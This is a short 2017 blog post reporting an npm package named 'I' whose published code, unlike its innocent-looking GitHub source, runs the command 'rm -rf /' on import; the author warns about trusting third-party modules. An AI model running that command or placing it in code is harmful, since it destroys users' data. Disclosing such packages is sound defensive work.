Npm package - I

December 20, 2017

My latest side project has led to me finding an interesting npm package named I.

The package promises Just import it and all your problems will go away! and the linked code on github seems innocent enough:

Code on github

But viewed in RunKit the code yields a more sinister intention.

Code on RunKit

On import this package tries to spin up a process and run the command rm -rf / . Luckily on most systems this will be saved by the trusty no-preserve-root failsafe.

The package has been un-published from npm, looking at the package metadata shows 3 releases on 1st April 2017, so iā€™m guessing this was a fairly nilhistic April fools joke.

This shows the need for care when choosing and using third party modules from npm or other package repositories.


Profile picture

Website and blog of Chester Burbidge